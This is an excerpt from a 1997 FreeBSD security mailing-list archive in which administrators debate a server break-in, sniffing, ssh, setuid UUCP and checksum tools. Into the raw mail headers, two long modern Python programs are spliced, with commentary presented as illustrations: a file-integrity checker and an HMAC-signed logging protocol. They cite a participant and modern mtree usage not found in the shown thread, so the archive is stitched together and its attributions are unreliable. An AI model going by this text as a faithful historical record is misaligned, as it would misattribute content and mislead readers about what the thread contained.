And even if he sniffed, he would never get the root password correct in the first place. I noticed one thing about 2.1.7R's password encryption that beats 2.2 and -CURRENT: if you had the number 1234567890 for the root password in 2.1.7R, you had to type the thing the same way 100% or it will say sorry when you try to su. With 2.2R and above, I have tried and verified this on a completely new machine: you can change the 0 at the end to any number and you will still get root access. What I was basically trying to say was that Jordan is still one of the best in making a fine solid OS, but remember that there is an old saying that breaking something is easier than fixing it. It takes just 10 seconds for an earthquake to destroy your house but it takes way more than that to rebuild it.

=)Fourth, you might as well take that machine off the net (turn it off) if
=)you can't get physical access to it for 2-4 months. It's gone gone gone!

The machine has been off even before you wrote that message ;-)

=)If you've been telnetting to it forever with no encryption, tcpwrappers, or
=)router filters, your hacker could have been on your system for weeks or
=)months before acting up and you wouldn't have a clue...

We had always run tcpwrappers as well as identd to verify who and where each person is coming in from, as well as constantly checking all processes every few minutes including the ones running in the background. The router filters would need some time to learn since it is a FreeBSD based box and I don't want to do anything that will lock everyone out, since that would defeat the purpose of having a filter. Besides, the hacker didn't know I was logged in to the machine with 10 shells in the first place since he only saw one of my un-hidden shells and tried to write me there when he was actively talking to jbhunt.
I was tracking him down in another pty which he deleted netstat already and didn't know I can replace it and track him down so fast and then added a route to reject all packets from his ppp connection. We even shut down the machine and disable everything in inetd.conf except telnet since we need to get back in but that still didn't stop him when he came back from another connection and just messed netstat up this time by caching netcom's DNS on his own machine. =)A few years ago when I was a weenie (ok, I still am compared to Jordan =)and Nate and... ;-) I challenged (deliberately) some of my more clueful =)customers to hack me...one of them was root on my system for almost a =)month before I noticed suspicious activity. Your descriptions of =)comparing files between machines (e.g. comparing byte sizes/dates of =)telnetd) suggest that you never ran anything like tripwire/cops to =)compute checksums of the files. Thus, you'd have NO clue which files =)really might have been changed. And if you DID run Tripwire before the =)hacker, and ran it again after the hacker, but didn't compare the result =)to a known clean OFFLINE copy of the tripwire database (e.g. a =)paper/floppy copy)...forget it! :) There would be no way to compare checksums of files anyways since these machines were both running -CURRENT and each revision of -CURRENT would have different checksums anyways. 
Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Tue Jul 29 15:47:00 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA18407 for security-outgoing; Tue, 29 Jul 1997 15:47:00 -0700 (PDT) Received: from j51.com (root@gorplex.j51.com [199.224.7.51]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA18392 for ; Tue, 29 Jul 1997 15:46:53 -0700 (PDT) Received: from localhost (aaronb@localhost) by j51.com (8.8.5/8.8.5) with SMTP id SAA09822; Tue, 29 Jul 1997 18:45:10 -0400 (EDT) Date: Tue, 29 Jul 1997 18:45:10 -0400 (EDT) 
From: Aaron Bornstein To: Vincent Poy cc: freebsd-security@FreeBSD.ORG Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

[Cc list trimmed, I'm assuming most of those people are on the list -- AB]

On Tue, 29 Jul 1997, Vincent Poy wrote:

> You would think your toaster is unhackable. So is a Leica camera
> lens but they still have ways to hack it. Also, just for your
> information, the root password isn't even used that often. It is only
> used every time the machine boots up since I run screen and I am connected
> 24 x7 and reattach the screen session when necessary.
>

Great, now you've effectively given everyone who sniffs your connection instant root access, no extra passwords necessary. Using screen in this manner merely opens another path to root, through an account not afforded anywhere near the same protection by the operating system.

> another machine and tracked him down and killed his connection. jbhunt
> was running a portscanner to check for any daemons running on a higher
> port number but didn't find any.
>

Don't forget the possibility of an existing daemon (such as telnetd or ftpd) being modified slightly to allow remote root access to a certain site or (more likely) anyone who presents the proper backdoor phrase/environment variable. [I believe JKH mentioned this already]

> True but the problem is we wished we had console access. If we
> did, none of this would even have happened I think.
>

Bullshit. If console access was available, the only portion of this process that would be made easier is the cleanup. Console access does not significantly raise your chances of -preventing- attacks.
--Aaron From owner-freebsd-security Tue Jul 29 15:54:52 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA19014 for security-outgoing; Tue, 29 Jul 1997 15:54:52 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA19009 for ; Tue, 29 Jul 1997 15:54:47 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA11593; Tue, 29 Jul 1997 15:54:41 -0700 (PDT) Date: Tue, 29 Jul 1997 15:54:40 -0700 (PDT) 
From: Vincent Poy To: Aaron Bornstein cc: freebsd-security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Tue, 29 Jul 1997, Aaron Bornstein wrote:

=)[Cc list trimmed, I'm assuming most of those people are on the list -- AB]
=)
=) Great, now you've effectively given everyone who sniffs your
=)connection instant root access, no extra passwords necessary. Using
=)screen in this manner merely opens another path to root, through an
=)account not afforded anywhere near the same protection by the operating
=)system.

If someone was sniffing my connection, then why weren't any of my screen sessions touched? I spend more time on the computer than most people would. As everyone knows, I only sleep 2-3 hours per day.

=)> another machine and tracked him down and killed his connection. jbhunt
=)> was running a portscanner to check for any daemons running on a higher
=)> port number but didn't find any.
=)>
=) Don't forget the possibility of an existing daemon (such as
=)telnetd or ftpd) being modified slightly to allow remote root
=)access to a certain site or (more likely) anyone who presents the proper
=)backdoor phrase/environment variable. [I believe JKH mentioned this
=)already]

That is always a possibility of course. Or they can install some daemon at a port.

=)> True but the problem is we wished we had console access. If we
=)> did, none of this would even have happened I think.
=)>
=) Bullshit. If console access was available, the only portion of
=)this process that would be made easier is the cleanup. Console access
=)does not significantly raise your chances of -preventing- attacks.

If console access was available, how would the sniffer sniff the console? Since that would not go through the network in the first place.
Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Tue Jul 29 16:00:52 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA19433 for security-outgoing; Tue, 29 Jul 1997 16:00:52 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA19428 for ; Tue, 29 Jul 1997 16:00:49 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA11622; Tue, 29 Jul 1997 16:00:40 -0700 (PDT) Date: Tue, 29 Jul 1997 16:00:38 -0700 (PDT) 
From: Vincent Poy To: sthaug@nethelp.no cc: freebsd-security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: <5883.870215424@verdi.nethelp.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Wed, 30 Jul 1997 sthaug@nethelp.no wrote:

=)[cc list trimmed]
=)
=)> I was considering installing ssh but there is only one problem.
=)> I use Win95 from my own side at times for various reasons as well as
=)> the other remote admins. So an ssh client does cost money. We're
=)> volunteers and are not getting paid in any shape or form.
=)
=)The ssh client for Windows is $99. Educational sites are eligible for a
=)50% discount. Or you could run the FreeBSD version - for free.

We're not an Educational site and are not getting paid by GaiaNet. We voluntarily help admin the machines remotely. I know the FreeBSD version is free but I am not always accessing the machines from the same physical location.

=)It sounds like you're saying that the extra hassle you and your fellow
=)system administrators (and your users) are having because of the breakin
=)is worth less than $99. Are you sure you have your priorities straight?
=)
=)(For comparison - I run ssh for practically *all* remote logins, even
=)on the same LAN. ssh won't solve all your security problems, but it can
=)be an important *part* of better security.)

And once again, note that we volunteer for GaiaNet; none of the money GaiaNet makes goes to us as admins. Even phone calls to track down hackers come out of our own pockets. Besides, the decision for the $99 spent is out of our own hands since we don't own GaiaNet. Only the owners have the power of say of what to buy and not buy.

=)With respect to passwords, your goal should be that no password is sent
=)in the clear. Ever. This is difficult to reach, but you'll find it helps
=)you to focus on security quite a bit.
This has nothing to do with us but the way things were designed originally. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Tue Jul 29 17:32:00 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA24529 for security-outgoing; Tue, 29 Jul 1997 17:32:00 -0700 (PDT) Received: from tok.qiv.com ([204.214.141.211]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA24511 for ; Tue, 29 Jul 1997 17:31:58 -0700 (PDT) Received: (from uucp@localhost) by tok.qiv.com (8.8.6/8.8.5) with UUCP id TAA08116; Tue, 29 Jul 1997 19:30:28 -0500 (CDT) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.6/8.8.5) with SMTP id TAA00636; Tue, 29 Jul 1997 19:29:49 -0500 (CDT) X-Authentication-Warning: acp.qiv.com: jdn owned process doing -bs Date: Tue, 29 Jul 1997 19:29:49 -0500 (CDT) 
From: "Jay D. Nelson" To: Adam Shostack cc: robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707291250.IAA12447@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

Sorry -- I guess I'm one of the old fart holdouts. I use uucp and many of my clients use uucp. From what I see, UUCP use is growing even though these machines never show up in the maps. I think uucp will grow even more.

Perhaps the best approach, if you really want to take it out of the standard distribution, is to make it an option at install time. Those that don't know what it is won't install it anyway.

Idiots will blow their feet off no matter how hard you try to protect them. All you will accomplish, if you take it out of the distribution, is force the idiots to use rm * instead and force me to go to MIT to get and install UUCP.

-- Jay

On Tue, 29 Jul 1997, Adam Shostack wrote:

->Robert Watson wrote:
->| On Mon, 28 Jul 1997, Adam Shostack wrote:
->|
->| > Vincent Poy wrote:
->| >
->| > su really should be setuid. Everything else is debatable. My
->| > advice is to turn off all setuid bits except those you know you need
->| > (possibly w, who, ps, ping, at, passwd)
->
->| Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc)
->| require root access to deliver to local mailboxes; crontab related stuff,
->| terminal locking, some kerberos commands, local XWindows servers, and su
->| all rely on suid.
->
->I know no one who still runs uucp. There are a few holdouts, but most
->systems can leave uucp off with no pain. Ditto with kerberos. :)
->
->Adam
->
->--
->"It is seldom that liberty of any kind is lost all at once."
-> -Hume -> -> From owner-freebsd-security Tue Jul 29 18:10:37 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA26375 for security-outgoing; Tue, 29 Jul 1997 18:10:37 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA26360 for ; Tue, 29 Jul 1997 18:10:30 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id VAA16708; Tue, 29 Jul 1997 21:06:39 -0400 (EDT) 
From: Adam Shostack Message-Id: <199707300106.VAA16708@homeport.org> Subject: Re: security hole in FreeBSD In-Reply-To: from "Jay D. Nelson" at "Jul 29, 97 07:29:49 pm" To: jdn@qiv.com (Jay D. Nelson) Date: Tue, 29 Jul 1997 21:06:39 -0400 (EDT) Cc: adam@homeport.org, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

Let me be clear; I don't have anything against UUCP users, but most people don't need it turned on. Since parts of it are setuid (and thus potential security holes), I think it's reasonable to suggest that it ship either not setuid or as an install option.

Yes, idiots will hurt themselves. Should we try to make FreeBSD reasonably secure? I think so. I think a good metric to use is: don't install uncommon services by default; require some action to turn them on.

Adam

Jay D. Nelson wrote:
| Sorry -- I guess I'm one of the old fart holdouts. I use uucp and many of my clients
| use uucp. From what I see, UUCP use is growing even though these machines
| never show up in the maps. I think uucp will grow even more.
|
| Perhaps the best approach, if you really want to take it out of the
| standard distribution, is to make it an option at install time. Those that
| don't know what it is won't install it anyway.
|
| Idiots will blow their feet off no matter how hard you try to protect them.
| All you will accomplish, if you take it out of the distribution, is
| force the idiots to use rm * instead and force me to go to MIT to get
| and install UUCP.
|
| -- Jay
|
| On Tue, 29 Jul 1997, Adam Shostack wrote:
|
| ->Robert Watson wrote:
| ->| On Mon, 28 Jul 1997, Adam Shostack wrote:
| ->|
| ->| > Vincent Poy wrote:
| ->| >
| ->| > su really should be setuid. Everything else is debatable.
My | ->| > advice is to turn off all setuid bits except those you know you need | ->| > (possibly w, who, ps, ping, at, passwd) | -> | ->| Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc) | ->| require root access to delivery to local mailboxes; crontab related stuff, | ->| terminal locking, some kerberos commands, local XWindows servers, and su | ->| all rely on suid. | -> | ->I know no one who still runs uucp. There are a few holdouts, but most | ->systems can leave uucp off with no pain. Ditto with kerberos. :) -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Tue Jul 29 18:14:09 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA26536 for security-outgoing; Tue, 29 Jul 1997 18:14:09 -0700 (PDT) Received: from eyelab.psy.msu.edu (eyelab.psy.msu.edu [35.8.64.179]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA26526 for ; Tue, 29 Jul 1997 18:14:02 -0700 (PDT) Received: from default (pm131-00.dialip.mich.net [35.9.14.191]) by eyelab.psy.msu.edu (8.8.6/8.8.5) with SMTP id VAA01876 for ; Tue, 29 Jul 1997 21:08:01 -0400 (EDT) Message-Id: <3.0.3.32.19970729211037.006c2180@eyelab.msu.edu> X-Sender: root@eyelab.msu.edu X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Tue, 29 Jul 1997 21:10:37 -0400 To: freebsd-security@freebsd.org 
From: Gary Schrock Subject: Re: security hole in FreeBSD In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > There would be no way to compare checksums of files anyways since >these machines were both running -CURRENT and each revision of -CURRENT >would have different checksums anyways. Now that one I have to disagree with. It's trivial to use something like mtree to set up your own set of files with checksums. And probably well worth the effort. Gary Schrock root@eyelab.msu.edu From owner-freebsd-security Tue Jul 29 18:14:41 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA26568 for security-outgoing; Tue, 29 Jul 1997 18:14:41 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA26562 for ; Tue, 29 Jul 1997 18:14:32 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id VAA16730; Tue, 29 Jul 1997 21:11:23 -0400 (EDT) 
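Gary Schrock's point above (keep your own set of checksums; on FreeBSD, mtree does it) and John-David Childs's earlier caveat (compare against an offline copy, not against sizes and dates on the compromised box) are illustrated below by an added example that is not code posted in this thread. It is written in Python rather than as an mtree invocation so that the logic is visible: it records size, permission bits, owner and SHA-256 per file, deliberately omits timestamps, and in a constructed temporary tree replaces a stand-in "netstat" with a same-length trojan whose mtime is put back. The size-and-date check the thread describes passes; the hash comparison does not. The directory layout, file contents and the name "netstat" are constructed for the demo.

```python
import hashlib
import json
import os
import shutil
import stat
import tempfile


def sha256_of(path: str) -> str:
    """Content hash of one file, read in chunks so large binaries do not sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Record size, permission bits, owner and SHA-256 for every regular file under root.
    Timestamps are deliberately left out: an intruder can restore them with touch/utime,
    so they prove nothing. The content hash is what catches a replaced binary."""
    spec = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, devices and sockets are skipped in this example
            rel = os.path.relpath(path, root)
            spec[rel] = {
                "size": st.st_size,
                "mode": stat.S_IMODE(st.st_mode),
                "uid": st.st_uid,
                "gid": st.st_gid,
                "sha256": sha256_of(path),
            }
    return spec


def compare(baseline: dict, current: dict) -> dict:
    """Report files added, removed, and (for files present in both) which attributes differ."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = {}
    for rel in sorted(set(baseline) & set(current)):
        diffs = [k for k in baseline[rel] if baseline[rel][k] != current[rel].get(k)]
        if diffs:
            changed[rel] = diffs
    return {"added": added, "removed": removed, "changed": changed}


def demo() -> dict:
    """Constructed scenario: take a baseline of a tiny tree, then replace one 'binary'
    with a same-length trojan whose timestamp is put back, and drop a new file."""
    root = tempfile.mkdtemp(prefix="baseline-demo-")
    try:
        bindir = os.path.join(root, "usr", "bin")
        os.makedirs(bindir)
        netstat = os.path.join(bindir, "netstat")
        with open(netstat, "wb") as f:
            f.write(b"#!/bin/sh\necho real netstat\n")  # stand-in for the real program
        with open(os.path.join(bindir, "w"), "wb") as f:
            f.write(b"#!/bin/sh\necho real w\n")
        os.chmod(netstat, 0o755)
        before = os.lstat(netstat)

        baseline = build_baseline(root)
        # The baseline must leave the machine (floppy, paper, another host);
        # the JSON round-trip here just stands in for that offline copy.
        offline_copy = json.dumps(baseline, sort_keys=True)

        # Trojan: identical byte count, different content, mode and mtime restored.
        with open(netstat, "wb") as f:
            f.write(b"#!/bin/sh\necho fake netstat\n")
        os.chmod(netstat, 0o755)
        os.utime(netstat, ns=(before.st_atime_ns, before.st_mtime_ns))
        # A dropped backdoor shows up as an added path.
        with open(os.path.join(bindir, ".login"), "wb") as f:
            f.write(b"backdoor\n")

        after = os.lstat(netstat)
        result = compare(json.loads(offline_copy), build_baseline(root))
        # What comparing sizes and dates (the method the thread describes) would have seen:
        result["size_and_date_unchanged"] = (
            after.st_size == before.st_size and after.st_mtime_ns == before.st_mtime_ns
        )
        return result
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The same baseline-then-compare cycle on current FreeBSD is `mtree -c -K sha256digest -p /usr/bin > usr-bin.spec` to create the specification and `mtree -p /usr/bin -f usr-bin.spec` to check against it; the point about -CURRENT is that the baseline is taken from your own build after each upgrade, not from someone else's binaries, and is stored off the box.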
From: Adam Shostack Message-Id: <199707300111.VAA16730@homeport.org> Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: from Robert Watson at "Jul 28, 97 03:29:43 pm" To: robert+freebsd@cyrus.watson.org Date: Tue, 29 Jul 1997 21:11:23 -0400 (EDT) Cc: security@FreeBSD.ORG, adam@homeport.org, rgrimes@GndRsh.aac.dev.com, dholland@eecs.harvard.edu X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

Robert Watson wrote:
| Is there any consensus on the use of DNSsec in the network community, as
| it has not yet been made widely available (or at least, it is available,
| but not largely used.) The key namespace here could be used however one
| desired, not necessarily in a DNS-style way. The entity-name, whatever
| that is, simply suggests which key/algorithm should be used; a server
| could be configured to pull that information from DNSsec, or from an
| internal key-file (or both.)

I don't trust the DNS right now. I also don't see a need to put keys there for local use. Use ssh to distribute them. :)

| An ACK message has already been stated as desirable -- would a simple
| signature over the last packet (or header + signature) using the shared
| secret, entity public key, or whatever, back on the TCP connection
| suffice? Maybe something lighter-weight?

I'm leaning to acks being simpler than involving the last packet, and towards them involving just a sequence number:

ACK log://somehost.evil.net:234566, HMAC

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume From owner-freebsd-security Tue Jul 29 18:55:30 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA28667 for security-outgoing; Tue, 29 Jul 1997 18:55:30 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA28657 for ; Tue, 29 Jul 1997 18:55:26 -0700 (PDT) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.5/8.7.3) id LAA16359; Wed, 30 Jul 1997 11:24:28 +0930 (CST) 
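The exchange Adam sketches above (a numbered log record authenticated with a shared key, and an ACK that carries just the sequence number and an HMAC) is shown below as an added example; it is not code from this thread or from any FreeBSD logging daemon. Both sides are in Python: HMAC-SHA256 over length-prefixed fields, a "LOG"/"ACK" tag inside the MAC so an ACK can never be replayed as a record, strictly increasing per-source sequence numbers on the receiver, and a one-shot ACK check on the sender so a resend list can be drained safely. The wire framing, the key, the host name and the log line are all assumptions constructed for the demo.

```python
import hashlib
import hmac
import struct

# Constructed shared secret for this example. A real deployment gives each logging host
# its own key and distributes it out of band (ssh, as suggested above), not via DNS.
SHARED_KEY = b"example-shared-secret-not-for-real-use"
MAC_LEN = 32  # HMAC-SHA256 output size


def _mac(key: bytes, *fields: bytes) -> bytes:
    """HMAC-SHA256 over length-prefixed fields, so field boundaries cannot be shifted."""
    h = hmac.new(key, digestmod=hashlib.sha256)
    for field in fields:
        h.update(struct.pack(">I", len(field)))
        h.update(field)
    return h.digest()


class LogSender:
    """Logging host: numbers each record, MACs it, and retires it only on a valid ACK."""

    def __init__(self, key: bytes, source: bytes):
        self.key = key
        self.source = source  # hypothetical entity-name, e.g. the host name
        self.seq = 0
        self.unacked = {}     # seq -> record; whatever stays here should be resent

    def make_record(self, message: bytes) -> bytes:
        self.seq += 1
        body = (struct.pack(">Q", self.seq)
                + struct.pack(">H", len(self.source)) + self.source
                + struct.pack(">I", len(message)) + message)
        record = body + _mac(self.key, b"LOG", body)
        self.unacked[self.seq] = record
        return record

    def check_ack(self, ack: bytes) -> bool:
        """ACK = b'ACK' + seq + HMAC(key, 'ACK', source, seq). Each ACK is honoured once."""
        if len(ack) != 3 + 8 + MAC_LEN or ack[:3] != b"ACK":
            return False
        seq_bytes, tag = ack[3:11], ack[11:]
        if not hmac.compare_digest(_mac(self.key, b"ACK", self.source, seq_bytes), tag):
            return False
        (seq,) = struct.unpack(">Q", seq_bytes)
        return self.unacked.pop(seq, None) is not None


class LogReceiver:
    """Log server: verify the MAC before parsing, then require strictly increasing seq."""

    def __init__(self, key: bytes):
        self.key = key
        self.last_seq = {}  # source -> highest accepted sequence number
        self.accepted = []  # (source, seq, message) the server would write to disk

    def receive(self, record: bytes):
        """Return (status, ack); status is 'ok', 'bad_mac', 'replay' or 'malformed'."""
        if len(record) < 8 + 2 + 4 + MAC_LEN:
            return "malformed", None
        body, tag = record[:-MAC_LEN], record[-MAC_LEN:]
        if not hmac.compare_digest(_mac(self.key, b"LOG", body), tag):
            return "bad_mac", None  # forged, or modified in transit
        try:
            (seq,) = struct.unpack(">Q", body[:8])
            (slen,) = struct.unpack(">H", body[8:10])
            source = body[10:10 + slen]
            (mlen,) = struct.unpack(">I", body[10 + slen:14 + slen])
            message = body[14 + slen:14 + slen + mlen]
        except struct.error:
            return "malformed", None
        if len(source) != slen or len(message) != mlen:
            return "malformed", None
        if seq <= self.last_seq.get(source, 0):
            return "replay", None  # an old record played back, or delivered out of order
        self.last_seq[source] = seq
        self.accepted.append((source, seq, message))
        ack = b"ACK" + body[:8] + _mac(self.key, b"ACK", source, body[:8])
        return "ok", ack


def demo() -> dict:
    """One honest exchange, then an ACK replay, a tampered record, a replayed record
    and a forged ACK. The host name and log line are constructed for the example."""
    sender = LogSender(SHARED_KEY, b"earth.example.net")
    server = LogReceiver(SHARED_KEY)
    record = sender.make_record(b"Jul 28 03:10:01 earth login: ROOT LOGIN REFUSED ON ttyp2")
    status, ack = server.receive(record)
    out = {"first": status, "ack_ok": sender.check_ack(ack)}
    out["ack_replayed"] = sender.check_ack(ack)       # same ACK again: already retired
    tampered = bytearray(record)
    tampered[-MAC_LEN - 1] ^= 0x01                    # flip one byte of the message
    out["tampered"] = server.receive(bytes(tampered))[0]
    out["replayed"] = server.receive(record)[0]       # genuine record, played back
    forged = b"ACK" + record[:8] + bytes(MAC_LEN)     # right seq, no key
    out["forged_ack"] = sender.check_ack(forged)
    out["second"] = server.receive(sender.make_record(b"next line"))[0]
    return out
```

The HMAC gives origin and integrity, not secrecy: the log lines still cross the wire in the clear, which is fine for this purpose but means nothing sensitive (passwords in the clear, as sthaug notes elsewhere in the thread) should be in them. The sequence number lives inside the MAC, so the receiver can reject replays without keeping a copy of every earlier record.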
From: Michael Smith Message-Id: <199707300154.LAA16359@genesis.atrad.adelaide.edu.au> Subject: Re: security hole in FreeBSD In-Reply-To: from "Jay D. Nelson" at "Jul 29, 97 07:29:49 pm" To: jdn@qiv.com (Jay D. Nelson) Date: Wed, 30 Jul 1997 11:24:28 +0930 (CST) Cc: adam@homeport.org, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Jay D. Nelson stands accused of saying: > Sorry -- I guess I'm old fart hold outs. I use uucp and many of my clients > use uucp. From what I see, UUCP use is growing even though these machines > never show up in the maps. I think uucp will grow even more. The ISP I feed from is making a lot of money selling UUCP email services to small and medium-sized businesses, often in conjunction with web hosting services. UUCP has a great deal more flexibility than using dialup POP or push-SMTP, and it's a winner in the "security" argument too. > Perhaps the best approach, if you really want to take it out of the > standard distribution, is to make it an option at install time. Those that > don't know what it is won't install it anyway. This is likely to happen with the next generation of installation software. -- ]] Mike Smith, Software Engineer msmith@gsoft.com.au [[ ]] Genesis Software genesis@gsoft.com.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control. (ph) +61-8-8267-3493 [[ ]] Unix hardware collector. "Where are your PEZ?" 
The Tick [[ From owner-freebsd-security Tue Jul 29 20:01:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA02170 for security-outgoing; Tue, 29 Jul 1997 20:01:35 -0700 (PDT) Received: from tok.qiv.com ([204.214.141.211]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA02165 for ; Tue, 29 Jul 1997 20:01:33 -0700 (PDT) Received: (from uucp@localhost) by tok.qiv.com (8.8.6/8.8.5) with UUCP id WAA08330; Tue, 29 Jul 1997 22:00:26 -0500 (CDT) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.6/8.8.5) with SMTP id VAA00857; Tue, 29 Jul 1997 21:58:24 -0500 (CDT) X-Authentication-Warning: acp.qiv.com: jdn owned process doing -bs Date: Tue, 29 Jul 1997 21:58:24 -0500 (CDT) 
From: "Jay D. Nelson" To: Adam Shostack cc: robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707300106.VAA16708@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Your point is well taken. That's why I suggested making it an install option very much like DES. I understand the risks with UUCP and, for the most part, tie it down to control access. Not all systems or networks are connected to the internet -- in fact, probably less than 50% are connected. In controlled environments, UUCP, rsh and all the traditional tools are quite useful. A knowledgeable Admin knows what needs to be done. There is no bullet proof system except the one turned off. Why cripple the experienced to protect the inexperienced? The beginners will learn, as we did, as they go along. -- Jay On Tue, 29 Jul 1997, Adam Shostack wrote: -> Let me be clear; I don't have anything against UUCP users, but ->most people don't need it turned on. Since its parts of it are ->setuid, (and thus potential security holes) I think its a reasonable ->to suggest that it ship either not setuid or as an install option. -> -> Yes idiots will hurt themselves. Should we try to make ->FreeBSD reasonably secure? I think so. I think a good metric to use ->is don't install uncommon services by default, require some action to ->turn them on. -> ->Adam -> ->Jay D. Nelson wrote: ->| 